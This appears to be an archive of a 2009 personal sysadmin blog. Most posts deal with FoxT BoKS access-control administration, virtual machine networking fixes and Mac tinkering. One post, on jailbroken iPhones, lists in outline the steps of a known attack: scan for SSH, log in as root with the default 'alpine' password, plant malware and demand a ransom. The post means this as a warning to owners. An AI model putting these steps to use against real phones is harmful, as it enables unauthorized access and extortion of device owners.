I've no clue what the NO_PWDF field does, but at least it does NOT stand for "no password force" :) Also, the field PSWFORCE does indeed have something to do with the enforcing of passwords, but not with the forced changing thereof. Instead it defines which guidelines and rules a new password must adhere to (see page 262 of the BoKS 6.5 admin guide). In the end our friendly FoxT support engineer informed me that the value I was looking for is a hex code that's part of the FLAGS field.

However, that's not why I over thought things.

In his email the engineer also showed how he derived the appropriate hex value from the FLAGS field, which led to:

BoKS > man passwd

boksadm -S passwd [-f|-F] [-x debug level] [user]

-f This option forces the user to enter a new password on the next login. Valid for superuser only.

Duh!

EDIT:

Obviously you can also use modbks -l $USER -L $DAYS to set the PSWLASTCHANGE field for the user back X amount of days past the PSWVALIDTIME. However, this isn't very practical since the PSWVALIDTIME field differs per user :)

You'd also be messing with information that could be important to a SOx audit, so you'd better not do it this way ;)


kilala.nl tags: , ,

View or add comments (curr. 0)

Unixerius is now official partner of FoxT

2009-11-05 07:08:00

FoxT's logo

I am proud to announce that my employer, Unixerius, is FoxT's official partner for the Benelux, starting per November 2009. We will be FoxT's preferred partner for the delivery of:

* BoKS Access Control licenses

* Pre-sales consulting

* After-sales consulting

* Implementation projects

* Daily management of BoKS infrastructures

* Training

It took us a year of lobbying, from planting the initial thought in my boss's head to getting the final signature on paper. I'm very glad that we finally managed to get the title and am looking very much forward to working with FoxT on improving both their market in the Netherlands as well as the product itself.


kilala.nl tags: , ,

View or add comments (curr. 1)

Obvious security hole in jail broken iPhones exploited

2009-11-02 17:02:00

Seriously, this was waiting to happen: Teenager "hacks" jail broken iPhones. The security hole is glaringly obvious and has been proven and verified by some of my security-expert acquaintances. And now, obviously, it's out in the open. Personally I wonder how the heck it took so long for this to happen.

The hole: jail broken iPhones often run an SSH daemon, allowing their owners access to the phone's operating system. Most of these owners unfortunately never change the default root password, thus giving anyone 100% access to their phones. I really don't understand why nobody has ever pushed this issue before.

The steps are painfully easy.

1. Do a port scan on T-Mobile's 3G IP range, looking for SSH servers.

2. Try to login as root using the default alpine password.

3. Install your root kit / malware / hostage message.

4. Ask that people send you five euros for the free "fix".

5. PROFIT!

The fix in question is also plainly, fscking obvious: change your root password (asshole)! The "hacker" in question says it's safe to just remove two files he installed and to change your password, but personally I'd do a completely clean wipe. There's no telling if anyone's left anything else as a present.

Some links:

* The topic at GoT that started it all.

* The news post at Tweakers.

* The original hostage website

* The "fix"

EDIT:

My pessimistic prediction for this week: the mainstream press will pick up on the story, misunderstand the issue and put the blame on Apple. Many geeks will try to diffuse the situation and explain that the fault lies with people who were mucking with things they don't understand, but their pleas will fall on deaf ears.

EDIT 2:

So I was wrong in one regard: this exploit -has- both been abused and reported before. How about December 2008 and July 2008? So, the only thing all of this really proves is that people in general don't listen and they don't learn.


kilala.nl tags: , ,

View or add comments (curr. 5)

Problem: upgrading to Parallels 4 breaks OpenSolaris networking

2009-10-31 10:39:00

After my recent upgrade to Parallels Desktop 4 I've run into yet another issue. Apparently upgrading from PD3 to PD4 introduces some minor changes to the networking setup, which causes OpenSolaris' ni interfaces to break.

"Break" turns out to be a large word, but it's still an inconvenience. Apparently during the upgrade process the virtual PCI slots get shuffled a bit, leading to the ni1 interface getting renamed. Before the upgrade everything ran on interface ni0, which started complaining about problems right after the upgrade.

Here's some of my troubleshooting. First, on boot you'll see:

WARNING: ni1: niattach: SA_eeprom is funny, assuming byte-mode

Failed to plumb IPv4 interface(s): ni0

svc.startd[7]: svc:/network/physical:default: Method "/lib/svc/method/net-physical" failed with exit status 96.

svc.startd[7]: network/physical:default misconfigured: transitioned to maintenance (see 'svcs -xv' for details)

Checking the svcs output doesn't actually give me much hints aside from the fact that interface ni0 can actually not be found. Both prtdiag and prtconf seem to confirm this. I then checked the output of dmesg to see if there's anything useful in there. There was.

solaris2 ni: [ID 328865 kern.info] ni1: pci_regs[0]: 00002800.00000000.00000000.00000000.00000000

solaris2 ni: [ID 328865 kern.info] ni1: pci_regs[1]: 01002810.00000000.00000000.00000000.00000000

solaris2 ni: [ID 328865 kern.info] ni1: pci_regs[2]: 02002814.00000000.00000000.00000000.00000000

solaris2 ni: [ID 297787 kern.warning] WARNING: ni1: niattac: SA_eeprom is funny, assuming byte-mode

And so on... This confirms that the ni driver and interface are working. It also tells me that there's an interface ni1. ni0 only gets mentioned when Solaris tries to actually start TCP/IP on ni0, which as has been said is not present. By typing "ifconfig ni1 plumb" I've confirmed that the network card is now in fact called ni1.

Hypothesis:

During the upgrade to Parallels Desktop 4 the virtual PCI slots got shuffled, leading to a rename of the network interface.

Solution:

mv /etc/hostname.ni0 /etc/hostname.ni1

mv /etc/dhcp.ni0 /etc/dhcp.ni1


kilala.nl tags: ,

View or add comments (curr. 3)

Problem: upgrading to Parallels Desktop 4 with suspended VMs

2009-10-29 07:49:00

I recently upgraded my Macbook with OS X 10.6 without a hitch. However, I soon discovered that Parallels Desktop 3.x does work work with Snow Leopard so I was kind of forced to upgrade Parallels as well. *shrug* Oh well...

The installation process of Parallels 4 requires that all virtual machines are shut down. They cannot be running, or suspended. Funny thing: how are you going to do that if you've already upgraded the OS and thus PD 3.x doesn't work anymore? Yeah ^_^;

I scoured the web to see if there was a command line trick to stop a suspended VM, but couldn't find one. In the end I had to boot from my backup hard drive, start PD3 from there and use it to shutdown the VMs on my Macbook's drive. At least PD4 looks pretty sweet :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Bye bye Powermac o/

2009-10-28 22:23:00

A bit over half a year after putting my Powermac G5 to bed I've actually gone and sold her. A new member at the MacFreak fora was interested in buying a cheap Mac to get his feet wet after living on Windows all his life. He'd tried Linux which wasn't "it" and now was curious about OS X. While the G5 is no powerhouse by today's standards it's still a very nice box for a beginner. G5 @1.6GHz with 1.5GB RAM and 200GB of hard drive space. I sold it for 220, which is a bit under the market price but it's definitely fair money for a six years old box.

Ah! I'll miss her a little bit. She was my very first Macintosh and she was definitely a woman after my tastes: reliable, gentle, nice to look at and built sturdily ^_^


kilala.nl tags: , ,

View or add comments (curr. 1)

Unix, BoKS and Nagios consulting

2009-10-25 18:28:00

I've been a Unix consultant in one form or another since the year 2000. Over those years I've gained expertise on the following subjects.

Thanks to the partnership between FoxT and my employer Unixerius I am an officially licensed BoKS consultant and trainer.

Other experience

Aside from my day-to-day Unix activities, I've also gained experience in the following fields:

Contacting me

I am currently employed by Unixerius, a small consulting firm in the Netherlands. We all specialize in one or two flavours of Unix and one or two additional fields (mine being monitoring and security). I am available for hire through Unixerius as I am not currently interested in going freelance.

You may also contact me directly.

For an overview of my work history, please visit my LinkedIn.com profile.


kilala.nl tags: , ,

View or add comments (curr. 0)

What is FoxT BoKS? A short introduction

2009-10-25 15:59:00

Boiling it down to one sentence one can say that BoKS enables you to centraly manage user accounts and access permissions, based on Role Based Access Control (RBAC).

The following article is also available as a PDF.




What is FoxT BoKS?

BoKS Access Control is a product of the Swedish firm FoxT (Fox Technologies), intended for the centralized management of userauthentication and authorization (Role Based Identity Management and Access Control). The name is an abbreviation of the Swedish "Behörighet- och KontrollSystem", which roughly translates as "Legitimicy and Control System".

Some key features of BoKS are:

Using BoKS you decide WHEN WHO gets to access WHICH servers, WHAT they can do there and HOW.

BoKS is a standalone application and requires no modifications of the server or desktop operating systems.


An example: Role Based Access Control

BoKS groups users accounts and computer systems based on their function within the network and the company. Each user will fit one or more role descriptions and each server will be part of different logical host groups. One could say that BoKS is a technical representation of your company's organisation where everyone has a clearly defined role and purpose.

Let us discuss a very simple example, based on a BoKS server, an application server and a database server.

Your database admins will obviously need access to their own work stations. Aside from that they will be allowed to use SSH to access those servers in the network that run their Oracle database. Because BoKS is capable of filtering SSH subsystems, the DBAs will get access to the command line (normal SSH login) and to SCP file transfer. All other SSH functions (like port forwarding, X11 tunneling and such) will be turned off for their accounts. Using the BoKS Oracle plugins your DBAs accounts will also be allowed to administer the actual databases running on the server.
The sysadmins will be allowed full SSH access from their work stations to all of the servers in the network. Aside from their own user accounts they will also be allowed to login using the superuser account, but that will be limited to each server's console to limit the actual risk of abuse. Because the system administrators are expected to provide 24x7 support they will also be allowed to create a VPN connection to the network, through which they can also use SSH. However, this particular SSH will only work if they have authenticated themselves using an RSA token.

To ensure a seperation of duties the system administrators will not be allowed access to any of the applications or databases running on the servers.
The actual users of BoKS, security operations, will gain SSH access to the BoKS security server. Aside from that they will also be allowed access to the BoKS web interface, provided that they've identified themselves using their PKI smart card.

Key features of BoKS

Centralized management of user accounts
No longer will you have to locally create, modify or remove user accounts on your servers. BoKS will manage everything from it's central security server(s), including SSH certificates, secondary Unix groups and personal home directories.

Centrally defined access rules
Users will only be allowed access to your computer systems based on the rules defined in the BoKS database. These rules define permissable source and destinations systems as well as the (time of) day and the communications protocols to be used.

Role based access control
Access rules can be assigned both to individual users as well as to roles. By defining these user classes you can create and apply a set of access rules for a whole team or department in one blow. This will save you time and will also lower the risk of human error.

Extensive audit logging
Every authentication request that's handled by BoKS is stored in the audit logs. At all times will you be able to see what's happened in your network. BoKS also provides the possibility of logging every keystroke performed by a superuser (root) account, allowing you greater auditing capabilities.

Real-time monitoring
The BoKS auditing logs are updated and replicated in real-time. This allows you to use your existing monitoring infrastructure to monitor for undesired activities.

Support for most common network protocols
BoKS provides authentication and authorization for the following protocols: login, su, telnet, secure telnet, rlogin, XDM, PC-NFS, rsh and rexec, FTP and SSH. The SSH protocol can be further divided into ssh_sh (shell), ssh_exec (remote command execution), ssh_scp (SCP), ssh_sftp (SFTP), ssh_x11 (X11 forwarding), ssh_rfwd (remote port forwarding) and ssh_fwd (local port forwarding).

Delegated superuser access
Using "suexec" BoKS allows your users to run a specified set of commands using the superuser (root) account. Suexec access rules can be specified on both the command and the parameter level, allowing you great flexibility.

Integration with LDAP and NIS+
If so desired BoKS can be integrated into your existing directory services like LDAP and NIS+. This enables you to connect to automated Human Resources processes involving your users.

Redundant infrastructure
By using multiple BoKS servers per physical location you will be able to provide properly load balanced services. Your BoKS infrastructure will also remain operable despite any large disasters that may occur. Disaster recovery can be a matter of minutes.


Product comparison

OpenLDAP eTrust AC BoKS AC
Centralized authentication management Y Y Y
Centralized authorization management Y (1) Y Y
Role based access control N Y Y
SSH subsysteem management N N Y
Monitoring of files and directories N Y Y
Access control on files and directories N Y N
Delegated superuser access Y (2) Y Y
Real-time security monitoring Y (3) Y Y
Extensive audit logging N Y Y
OS remains unchanged Y N Y
User-friendly configuration N Y Y
Reporting tools N Y Y
Password vault functionality N Y Y (4)

1: Only for SSH.
2: Using additional software.
3: Locally, using syslog.
4: Using the optional BoKS Password Manager module.


kilala.nl tags: , ,

View or add comments (curr. 11)

Dropbox made things a lot easier!

2009-10-25 08:41:00

Manga + Dropbox = ereader!

I've been thinking of solutions to reading manga on the road, usually opting to just bring a pocket book or two. However, now that I've started using Dropbox life's gotten a bit easier. No more need for one of those eBook readers with electronic ink and such, because my iPhone screen is -just- big enough to comfortably read comics. Hooray for the Dropbox iPhone app which gives me access to my DB share everywhere I can have 3G Internet access.

For those unaware what Dropbox is: it gives you 2GB of free online storage space which you can access from a web browser, an iPhone app, or using software for Mac, Windows or Linux. On the PC side of things your Dropbox will appear as a normal directory in your homedir. However, everything you put in that directory will automatically get synchronized to your online storage. This ensures that your files are accessible from all your computers and even when you're someplace else with a browser. Nice.


kilala.nl tags: , ,

View or add comments (curr. 0)

Upgraded to OS X Snow Leopard

2009-10-25 07:46:00

Screenshot of my Macbook with Snow Leopard(Clickable)

Last week I finally got my mits on our OS X Snow Leopard install disc. After properly backing up my Macbook and disabling the guest acount (to ward off the horrible bug) the install went without a cinch. I fell asleep on the couch while it was running, but I reckon it didn't take more than half an hour. Anywho, afterwards (as expected) everything seemed exactly the same because just about all the changes took place under the hood.

Inspired by some fellow Arsians I went and tinkered some more with Geektool. On my desktop I now have:

* Output from top for the six heaviest processes running.

* SMART status LED for my internal hard drive

* IP address info for Ethernet, Wif and my Internet connection.

* The time and date :)

* In Iron Man's hand:

** Status LED for charger cable

** Current charge percentage of the battery

** Status LED for charging process of battery

Also, here's the original file for the Iron Man background.


kilala.nl tags: ,

View or add comments (curr. 0)

Wat is FoxT BoKS? Een korte introductie

2009-10-20 07:36:00

In een zin samengevat is het met BoKS mogelijk om vanuit een centrale server gebruikersaccounts en toegangsrechten te beheren op basis van Role Based Access Control (RBAC).

Het volgende artikel is ook beschikbaar als PDF.




Wat is FoxT BoKS?

BoKS Access Control is een product van de Zweedse firma FoxT, bedoelt voor het centrale beheer van gebruikersauthenticatie en -authorizatie (Role Based Identity Management en Access Control). De naam is een afkorting voor het Zweedse "Behörighet- och KontrollSystem", wat zich laat vertalen als "Legitimatie en controle systeem".

Belangrijke features van het pakket zijn onder andere:

Met behulp van BoKS bepaalt u WIE WANNEER toegang krijgt tot WELKE servers, WAT hij daar mag doen en HOE.

BoKS is een vrijstaande applicatie en vereist geen aanpassingen aan het besturingssysteem van uw servers en desktop systemen.


Een praktijkvoorbeeld: Role Based Access Control

Gebruikers en computersystemen worden in BoKS gegroepeerd op basis van hun functie binnen het netwerk. Elke gebruiker kan beschikken over één of meerdere rollen en elke server maakt deel uit van verscheidene host groepen. De BoKS database is feitelijk een weergave van het organogram van de organisatie, waarbij eenieder een eigen rol binnen het bedrijf vervult.

Als voorbeeld nemen we een netwerk met een BoKS security server, een applicatie server en een database server.

De database beheerders krijgen toegang tot hun eigen werkstations. Daarnaast worden zij toegestaan om met behulp van SSH op hun Oracle servers in te loggen. Omdat BoKS in staat is om ook op SSH subsystemen te filteren, krijgen de DBA's toegang tot de command line en kunnen zij bestanden kopiëren met behulp van SCP. Zij zullen echter geen gebruik kunnen maken van X11 forwarding of SSH port forwarding. Met behulp van de BoKS Oracle plugin worden ook hun gebruikersaccounts in Oracle zelf aangemaakt zodat zij de volledige controle over hun databases krijgen.
De systeembeheerders krijgen vanaf hun werkstations SSH toegang tot alle servers in het netwerk. Om hun werkzaamheden uit te kunnen voeren krijgen zij toegang tot alle SSH functies en mogen zij daarnaast met het superuser account inloggen op de console. Omdat de systeembeheerders 24x7 support leveren mogen zij ook via een VPN verbinding met SSH inloggen. Echter, zij zullen dit alleen mogen wanneer zij zich met een RSA token hebben geauthenticeerd.

Vanwege de strikte functiescheiding zullen de systeembeheerders geen toegang krijgen tot de applicaties en databases die op de servers actief zijn.
Security operations, de eigenlijke gebruikers van BoKS, krijgen SSH toegang tot de BoKS security server. Daarnaast krijgen zij toegang tot de BoKS web interface, mits zij zich identificeren met behulp van een smart card met PKI certificaat.

Key features van BoKS

Centraal beheer van gebruikersaccounts
Het aanmaken, wijzigen en verwijderen van gebruikersaccounts en aanverwante zaken hoeft niet langer lokaal te gebeuren. BoKS beheert niet alleen user accounts, maar ook SSH certificaten, secundaire Unix groepen en home directories.

Centraal gedefinieerde toegangsregels
Gebruikers krijgen toegang tot systemen op basis van toegangsregels in de BoKS database. Deze regels stellen eisen aan zowel het bron- als het doelsysteem, het tijdstip en het gebruikte protocol.

Role based access control
Toegangsregels kunnen worden toegekend aan individuele gebruikers, maar kunnen ook worden verbonden aan rollen. Zo wordt het mogelijk om per afdeling een set toegangsregels te definiëren, waarmee veel tijd en risico’s bespaard kunnen worden.

Diepgaande audit logging
Elke authorisatieaanvraag die door BoKS wordt behandeld wordt opgeslagen in de audit logs. Zo kan men ten alle tijden zien wat er zich in het netwerk heeft afgespeeld. Daarnaast is het mogelijk om voor de superuser keystroke logging te activeren zodat bij kan worden gehouden welke commando’s een gebruiker heeft uitgevoerd.

Real-time monitoring mogelijkheden
De BoKS audit logs worden real-time aangevuld waardoor het mogelijk wordt om met monitoring tools alarmen te verbinden aan bepaalde situaties.

Ondersteuning voor alle gebruikelijke protocollen
BoKS ondersteunt authenticatie en authorizatie controle voor de volgende protocollen: login, su, telnet, secure telnet, rlogin, XDM, PC-NFS, rsh en rexec, FTP en SSH. Het SSH protocol kan verder worden opgesplitst in ssh_sh (shell), ssh_exec (remote command execution), ssh_scp (SCP), ssh_sftp (SFTP), ssh_x11 (X11 forwarding), ssh_rfwd (remote port forwarding) en ssh_fwd (local port forwarding.

Gedelegeerde superuser toegang
Met behulp van de suexec functionaliteit van BoKS wordt het mogelijk om gebruikers zeer gelimiteerde toegang te geven tot superuser accounts. De suexec toegangsregels kunnen tot op het parameter niveau aangeven welke commando’s uitgevoerd mogen worden als root.

Integratie met LDAP en NIS+
Indien gewenst is het mogelijk om BoKS samen te laten werken met directory services als LDAP en NIS+. Zo wordt het onder andere mogelijk gemaakt om aan te sluiten bij geautomatiseerde HR processen met betrekking tot het in en uit dienst treden van medewerkers.

Redundant uitgevoerde infrastructuur
Het gebruik van meerdere BoKS servers per fysieke locatie maakt load balancing mogelijk. Tijdens een catastrofe zal de BoKS infrastructuur beschikbaar blijven, waarbij disaster recovery binnen afzienbare tijd behaald kan worden.


Productvergelijking

OpenLDAP eTrust AC BoKS AC
Centraal user beheer Y Y Y
Centraal authorisatie beheer Y (1) Y Y
Role based access control N Y Y
SSH subsysteem beheer N N Y
Monitoring van bestanden N Y Y
Toegangsbeheer op bestanden N Y N
Gedelegeerde superuser toegang Y (2) Y Y
Real-time security monitoring Y (3) Y Y
Diepgaande audit logging N Y Y
OS blijft ongewijzigd Y N Y
Gebruiksvriendelijke configuratie N Y Y
Rapportage tooling N Y Y
Password vault functionaliteit N Y Y (4)

1: Alleen voor SSH.
2: Met behulp van extra software.
3: Decentraal, met behulp van bijvoorbeeld syslog.
4: Met behulp van de BoKS Password Manager module.


kilala.nl tags: , ,

View or add comments (curr. 0)

Computer parlance - the divide between geeks and users

2009-10-18 17:59:00

I try to help out people with computer/network questions on various online fora, like Tweakers and One more thing. One of the things that frequently leads to both confusion and frustration is the divide between the parlance of true geeks and normal users.

For example, take this thread where people discuss the ins and outs of the UPC broadband service. Many, many times will one see frustration arise between the lesser experienced members and the veritable geeks regarding the usage of m/M and bit/byte.

As in:

* m versus M = mili versus mega = 10^-3 versus 10^6

* bit versus byte = 1 bit versus 8 bits

Normal folks will happily mix their m's and their M's and their bits and their bytes, not caring about the meaning of either. They reason according to the famous adage "Do what I mean, not what I say". So you'll frequently see things like:

Until two days ago I could happily download at a well-deserved 30mbits, which today fell to a miserable 5mbits. Then I rebooted the modem and now it's back up to 3.5mbits, so I R happy.

Does that sound confusing to you? Because to every true IT geek out there it does! So now there's dozens of folks like me berating the folks who keep mixing stuff up to "get it right because you're not making sense". Of course we are then in turn labeled as nitpicks (or "comma fornicators" as the dutch term would translate). The thing is, even though SI units are piecemeal to every (IT) geek, it seems that most "normal" people don't know all of them.

Sure, they know their milis from their centis and their kilos from their decas, but I don't think anyone in primary or high school usually deals with megas or anything bigger. Pretty odd, since you'd imagine that science class will cover stuff like megaWatts etc. A quick poll with Marli (who is otherwise a very intelligent AND computer-savy person) supports this idea: she knows "m", but not "M" and doesn't know the difference between a bit and a byte.

Ah, what're you going to do? I don't think this is a divide we'll quickly bridge, unless we unify to a completely new unit for measuring network speeds :) Might I suggest the "fruble"?

EDIT:

Mind you, I didn't write this just to rant. As an aspiring teacher I actually -do- wonder how one would best work around such a problem. Verbally there isn't any ambiguity because one would always say "mbit" or "megabit" in full. But in writing there's much room for laziness and confusion, as discussed above. So, what do you do as a teacher? Do you keep on hammering your students to adhere to the proper standards? To me, that does make much sense.

EDIT 2:

*sigh* Then again, if even the supposed "professionals" can't get it right, who are we to complain. Right? =_=;

UPC doesn't know their bits from their bytes


kilala.nl tags: , , ,

View or add comments (curr. 5)

BoKS database tables - an overview

2009-10-08 08:54:00

Documentation on the actual contents and makeup of the BoKS database is sparse and hard to find. The BoKS system administrator's manual doesn't mention any details, nor does FoxT's website. This isn't very odd, because in general FoxT would not recommend that people muck about in the database. However in some cases it's very important to know what's what and how you can extract information. Case in point, my earlier database dump script for migrations.

In the past I've pieced together an overview of the various database tables, which is far from conclusive. I still need to update this list using some unofficial BoKS documentation, but below you'll find the summary as it stands now.

In the mean time you can find the unofficial documentation of the BoKS database tables by reading the following file on your BoKS master: $BOKS_lib/gui/tcl/base/boksdb.tcl

 

BoKS database tables

# Contents # Contents
0 System parameters 27 -
1 User accounts 28 -
2 User access routes 29 -
3 - 30 -
4 SSH authentication methods
31 User SSH authenticators
5 Currently logged-in users
32 -
6 Hosts 33 ? don't know yet ?
7 Host group -> host 34 Certificates for HTTPS et al
8 ? don't know yet ? 35 -
9 Host -> host group 36 -
10 - 37

Suexec program groups AND!

LDAP server names

11 ? don't know yet ? 38 ? don't know yet ?
12 - 39 -
13 - 40 -
14 Certificates for HTTPS et al
41 Server virtual cards ?
15 IP address -> host 42 -
16 User class access routes 43 -
17 User classes 44 BoKS users -> LDAP entries
18 - 45 -
19 - 46 -
20 Log rotation settings, see logadm
47 Unix group -> GID
21 - 48 User -> GID
22 Seccheck and filmon settings
49 User -> user class
23 LDAP bind settings 50 -
24 - 51 -
25 Password complexity settings 52 -
26 - 53 -
    54 -

 

BoKS database interconnections diagram

BoKS database tables diagram

 

BoKS database relational schema

BoKS database relational schema

My colleagues Erik Bleeker and Patryck Winkelmolen have created a lovely Visio diagram of the BoKS database, its tables and fields and the relations between all of these. It took them quite a while to complete the puzzle, so they should be proud of their work! Lucky for us they were friendly enough to share the drawing with the rest of the world. I've included the Visio schematic over here with their permission.


kilala.nl tags: , ,

View or add comments (curr. 0)

Open Coffee Almere, still fun and enjoyable

2009-10-01 18:47:00

Today's the first Thursday of the month, which means that it was time for another installment of Open Coffee Almere. It was our fifth get-together and I was glad to see about a dozen people show up. There were two other regulars, but the rest of'm were all new faces. One attendant even came down from the Leiden area!

I enjoyed myself tremendously and got to meet a few interesting people. The aforementioned gentleman does something really cool: he provides clinics where he combines lectures on champagne (the drink) with a certain message that management wants to convey to their colleagues. Say for example that a company would like to Go Green! (as they say). He would start the usual clinic about champagne and its many intricacies and then veer off towards ecological farming and how there's an analogy with what the company would like to achieve. I'm making a mess of explaining it, but it's really pretty cool -> Champagne Experience.

Today was the first time we'd gathered at the Tante Truus lunch room in town. I had no idea what to expect, so I was pleasantly surprised. The decor is lovely, the pie's great and the coffee awesome (they include a glass of water and a smidge of Baileys plus whipped cream with every coffee). I'd heartily recommend Truus for lunch or a break in the Almere Stad area.


kilala.nl tags: ,

View or add comments (curr. 3)

Making managing BoKS sub-administrators easier

2009-09-28 10:23:00

BokS' administrative GUI is far from a work of art, at least those versions I've worked with (up to and including 6.5.3). The web interface feels kludgy and it's apparent that it was designed almost ten years ago. I'm aware that FoxT are working on a completely new Java-driven GUI, so I'm very curious to see how that turns out!

In the mean time I've asked them to look at an improvement regarding the GUI that the might not have thought of before: the management of sub-administrators.


How do sub-administrators work?

In BoKS one can opt to delegate certain administrative tasks to other departments. For example, one could delegate the creation of simple Unix user accounts to the help desk in order to free up time for the 2nd and 3rd lines of support to do "important" things. In BoKS people with delegated access are called sub-administrators. It's important to remember that -everybody- with the "BOKSADM" access route gets full access to the BoKS web interface, unless they're defined as sub-admins.

According to the BoKS manual the following tasks can and cannot be delegated.


CAN be delegated CANNOT be delegated
User Administration
Access Control (partial)
Host Administration (partial)
Virtual Card Administration
Encryption Key Administration (partial)
Log Administration
Integrity Check
File Monitoring
Database Backup
User Inactivity Monitoring
Host Administration (partial)
LDAP Synchronization
Password Administration
UNIX Groups Administration
Sub-Administrator Configuration
BoKS Agent Configuration
Authenticator Administration
CA Administration

Within each section it's possible to further limit the administrative rights. For example, if you allow your help desk to create simple Unix accounts you may want to limit them to a certain number of user classes, host groups or UID ranges. This can be done, but is quite a hassle. You will need to configure each user separately, on a per-user basis. Frankly, doing this through the web interface sucks, especially if you have a huge list of user classes and want to include/exclude large numbers of classes.

Luckily there is a way to make things a -little- easier for yourself.


What happens under water? Configuration files galore!

I found out that all sub-administrator configuration is held on the file system and NOT in the BoKS database. I found this a bit odd, as it seems logical to keep stuff like this in the DB. This is also why I issued my original feature request: to bind sub-admin rights to BoKS user classes. But no, for now (BoKS 6.5.3 and lower) this config is held in $BOKS_var/subadm.

After enabling sub-administrator access for a particular user BoKS will create a new file in this directory, called $HOSTGROUP:$USERNAME.cfg thus binding it to a specific account. Browsing through this file I discovered how the access limitations work and to be honest: IMNSHO it's a kludge. For each particular section of the BoKS interface you will find a function (TCL subroutine?) that looks something like this:

boks_subadmin_check_$SECTION {
if "getlist" { return "ENTRY1 ENTRY2 ENTRY3 ... ENTRYn" }
if "changeitem matches ENTRY1 || ENTRY2 || ENTRY3 || ... || ENTRYn" { return 1 }
}

That's right, the configuration file actually contains subroutines that return a 0 or a 1 depending on which access rights you've given the user. If you've given him access to a hundred user classes there will be a subroutine with an IF-statement that has a hundred || OR-statements. Ouch. I've said it before and I'll say it again: it's time for a proper (relational) database.


Work around: making sub-administrator templates for BoKS

The way to make managing sub-administrators easier is not very userfriendly, but it's surprisingly easy.

  1. Convert one team member to sub-admin.
  2. Configure this one person through the web interface.
  3. Login to the BoKS master server and become root.
  4. Go into $BOKS_var/subadm.
  5. Copy $HOSTGROUP:$USERNAME.cfg to $USERCLASS.template, then chmod 644.
  6. for USER in $(classadm -L -u $USERCLASS); do cp -p $USERCLASS.template $USER.cfg

Done!

Obviously you'll want to copy $BOKS_var/subadm to all your replica servers as well. If you don't you'll give -everyone- with an "BOKSADM" access route full access to the GUI. I suggest setting up an rsync for this.


One final, very big "gotcha!"

My colleague Wim realized that the current way of sub-admin delegation has one very big flaw. Every time you add a new host group or user class you will need to update all .CFG files to match this. Of course, using the aforementioned templates will make this easier because you can update one file and then copy it to the whole team. But still...


kilala.nl tags: , ,

View or add comments (curr. 1)

Converting Unix epoch time to other formats

2009-09-25 09:37:00

The Epoch Converter website is truly a handy resource! Anything you'd ever want to do with epoch dates gathered onto one easy to read/browse page. Awesome!

It's got information for many different operating systems and programming languages so you're never lost. *bookmark*


kilala.nl tags: , ,

View or add comments (curr. 0)

Submitted a bugfix to fix a BoKS bugfix

2009-09-24 10:17:00

This morning I discovered a bug in one of FoxT's "hotfixes" (aka patch, bugfix) for BoKS 6.0.x. Maybe the problem exists for other BoKS versions as well. The hotfix in question is TFS 061016-115513 which enables BoKS 6.0 to work with the ssh_pk_optional authentication method. Before this hotfix you were forced to use either password or SSH key authentication, but never both. With the hotfix applied you can now use SSH key authentication, but fall back to password if the keys are missing.

Anywho... I found out that on Solaris 10 the hotfix does not actually replace all necessary files if you run BoKS 6.0. Here's the list of files that get replaced:

Sol10 = boks_sshd, mess.eng

Sol8 = boks_sshd, mess.eng, boks_servc_d, method.conf, plus a few GUI forms.

After conferring with BoKS-guru Wilfrid at FoxT it seems that the patch will treat Solaris 10 as client-only systems, which sucks when you're appying it to a replica or master server. In order to fix a Sol10 replica/master you'll need to manually copy the files from the Sol8 part of the fix to their intended destinations. This should work without any problems as Sol10 is fully backwards compatible with Sol8.


kilala.nl tags: , ,

View or add comments (curr. 0)

Nagios script: check_cnr

2009-09-14 22:05:00

This script is used to monitor the basic processes that go with Cisco's CNR (Network Registrar), which can be likened to a DHCP server. Cisco's Support Wiki described CNR as follows:

Cisco CNS Network Registrar is a full-featured DNS/DHCP system that provides scalable naming and addressing services for service provider and enterprise networks. Cisco CNS Network Registrar dramatically improves the reliability of naming and addressing services for enterprise networks. For cable ISPs, Cisco CNS Network Registrar provides scalable DNS and DHCP services and forms the basis of a DOCSIS cable modem provisioning system.

As said my script only checks the basics of CNR to ensure that the required daemons are running. It does not actually check any of the functionality, though at a later point in time it may be expanded to include this.


Usage of check_cnr

./check_cnr [-nagios|-tivoli] [-d -o FILE]
-nagios	Nagios output mode (default)
-tivoli	Tivoli output mode
-d	Debug mode
-o 	Output file for debug logging

Output

Depending on which mode you've selected the output of the script will differ slightly.

In Tivoli mode the output will be limited to a numerical value as the script is to be used as a "numeric script". 0 = OK, 1 = WARNING/UNKNOWN, 2= SEVERE. The exit code of the script will be identical to this value.

In Nagios mode the exit code of the script will be be similar to Tivoli's, with the exception that the value 3 portrays an unknown state. The output on stdout includes the service name and state (CNR OK/NOK) and a helpful error message.


Limitations


Download

Download check_cnr.sh
$ wc check_cnr.sh
189     666    4531 check_cnr.sh

$ cksum check_cnr.sh
4161895780 4531 check_cnr.sh

kilala.nl tags: , , ,

View or add comments (curr. 0)

Coming up: a refresh of my Nagios and Tivoli plugins

2009-09-14 19:35:00

For the longest of times my Nagios plugins have used a rather oldfashioned approach to configuration: everything's hardcoded into the script and you'll need to modify the script to make changes. Obviously that sucks if you want to use the script for multiple purposes. My newer scripts all use command line flags and parameters to pass variables, making them a lot more versatile. Hence I will soon be rewriting all my Nagios plugins for this particular purpose.

I will also be changing their individual pages, putting the plugin back into its own .ksh script instead of including the code into the HTML page. Whatever was I thinking when I did that?!

Finally, I will also modifying all plugins (also the new ones) to work with multiple monitoring systems. By passing a certain command line option one will be able to chose between modes for Nagios and Tivoli, with possible extensions along the way.

I've got my work cut out for me!


kilala.nl tags: , ,

View or add comments (curr. 0)

Published three new BoKS admin scripts

2009-09-12 23:01:00

The past few months I've been working on some BoKS scripts. Let's say that my daily job's inspired me to write a number of scripts that I just -know- are going to be useful in any BoKS environment. I've got plenty ideas for both admin and monitoring scripts and finally I'm starting to see the fruits of my labour!

All of these scripts were written in my "own" time, so luckily I can do with them as I please. I've chosen to share all these scripts under the Creative Commons license which means that you can use them, change them and even re-use them as long as you attribute the original code to me. I guess it sounds a bit like the GPL.

Anywho, for now I've published three scripts, with more to come! All scripts can be found in the Sysadmin section of my site, in the menubar. So far there are:

1. boks_safe_dump, which creates database dumps for specific hosts and host groups.

2. boks_new_rootpw, which sets and verifies new passwords on root accounts.

3. check_boks_replication, a monitor script to make sure BoKS database replication works alright.

As they say in HHGTTG: Share and enjoy!


kilala.nl tags: , , ,

View or add comments (curr. 1)

BoKS_safe_dump - Script for making BoKS database dumps

2009-09-11 15:30:00

